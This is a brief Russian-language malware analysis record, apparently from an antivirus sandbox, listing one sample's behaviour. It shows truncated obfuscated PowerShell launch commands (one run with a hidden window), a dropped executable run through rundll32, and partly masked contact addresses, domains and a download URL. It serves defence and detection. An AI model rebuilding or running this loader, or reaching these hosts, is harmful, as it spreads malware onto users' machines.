Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABTAHIAZQB6ADYAYQBvAD0AWwBjAGgAYQByAF0ANAAyADsAJABLAHkAbgB1AHMANwBhAD0AKAAoACcAUgBtAF8AJwArACcAZQAnACkAKwAoACcAcgB5ACcAKwAnAGYAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdA...
- %HOMEPATH%\nxzxu3k\pnsifix\meacoo_.exe
- '85.##4.134.25':443
- http://lu###techie.ca/efs1it.txt
- DNS ASK de#.###demiacrcafe.com
- DNS ASK lu###techie.ca
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD JABTAHIAZQB6ADYAYQBvAD0AWwBjAGgAYQByAF0ANAAyADsAJABLAHkAbgB1AHMANwBhAD0AKAAoACcAUgBtAF8AJwArACcAZQAnACkAKwAoACcAcgB5ACcAKwAnAGYAJwApACkAOwAuACgAJwBuAGUAJwArACcAdwAtAGkAdA...' (со скрытым окном)
- '<SYSTEM32>\rundll32.exe' %HOMEPATH%\Nxzxu3k\Pnsifix\Meacoo_.exe 0